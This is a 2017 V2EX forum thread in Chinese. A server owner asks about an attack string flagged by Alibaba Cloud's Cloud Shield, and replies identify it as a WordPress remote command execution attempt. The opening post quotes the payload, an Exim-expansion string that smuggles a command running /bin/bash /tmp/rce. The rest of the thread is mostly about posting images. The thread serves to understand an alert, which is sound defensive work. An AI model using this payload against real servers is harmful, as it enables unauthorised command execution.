首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
DataPacket
CDN77
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
广告
voocel
V2EX  ›  Linux

关于阿里云云盾的攻击访问分析

  •   
  •   voocel ·
    voocel · 2017-05-31 14:06:13 +08:00 · 2737 次点击
    这是一个创建于 2519 天前的主题,其中的信息可能已经有所发展或是发生改变。

    https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png 阿里云的云盾,这串玩意儿是干啥 target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)

    这里不应该是我服务器的 ip 或者域名吗

  • substr
  • spool_directory
  • 云盾
  • froot
    16 条回复    2017-06-01 00:21:11 +08:00
    voocel
        1
    voocel  
    OP
       2017-05-31 14:07:16 +08:00
    https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png
    voocel
        2
    voocel  
    OP
       2017-05-31 14:11:15 +08:00
    ![QQ 截图 20170531135932.png]( https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png)
    voocel
        3
    voocel  
    OP
       2017-05-31 14:12:18 +08:00
    <img src="https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png" alt="QQ 截图 20170531135932.png" title="QQ 截图 20170531135932.png" />
    voocel
        4
    voocel  
    OP
       2017-05-31 14:12:38 +08:00
    发个图片,真难!
    t333st
        5
    t333st  
       2017-05-31 14:38:23 +08:00
    尝试进行远程命令执行,可能攻击者的程序 变量没替换成功就发起了请求
    lisonfan
        6
    lisonfan  
       2017-05-31 14:39:22 +08:00
    发帖用 markdown 回帖直接贴链接
    voocel
        7
    voocel  
    OP
       2017-05-31 15:32:36 +08:00
    @lisonfan 一楼就是直接贴的链接,并没有显示出来,你看有什么毛病吗
    lisonfan
        8
    lisonfan  
       2017-05-31 15:38:38 +08:00
    @voocel #7 一楼显示出来了啊
    voocel
        9
    voocel  
    OP
       2017-05-31 15:39:37 +08:00
    @lisonfan 这么神奇,我自己看的的还是一个链接
    laoyur
        10
    laoyur  
       2017-05-31 15:42:04 +08:00
    @lisonfan #8 你是不是装什么黑科技插件了,没有显示出来诶
    v2 的正文支持 markdown,回复不支持,但回复支持 url 贴图,不过又仅支持部分 sinaimg 和 imgur ……
    lisonfan
        11
    lisonfan  
       2017-05-31 15:43:01 +08:00
    @voocel #9
    @laoyur #10

    lisonfan
        12
    lisonfan  
       2017-05-31 15:44:49 +08:00
    但是我用 Chrome 匿名模式也看着是一个链接,难道是 https://chrome.google.com/webstore/detail/v2ex-plus/daeclijmnojoemooblcbfeeceopnkolo 这个插件的功劳?
    Devmingwang
        13
    Devmingwang  
       2017-05-31 22:20:28 +08:00 via Android
    @voocel markdown 不会用吗?请问?
    ![]
    ( https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png)
    Devmingwang
        14
    Devmingwang  
       2017-05-31 22:22:19 +08:00 via Android
    哦,括号没用英文。。。
    ic3z
        15
    ic3z  
       2017-05-31 22:59:52 +08:00 via Android   ❤️ 1
    wordpress 的一个 rce
    http://www.freebuf.com/vuls/133849.html
    voocel
        16
    voocel  
    OP
       2017-06-01 00:21:11 +08:00 via Android
    @ic3z 谢谢,请问我这每天总会有几个恶意 ip,这正常吗
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   2958 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 29ms · UTC 15:12 · PVG 23:12 · LAX 08:12 · JFK 11:12
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.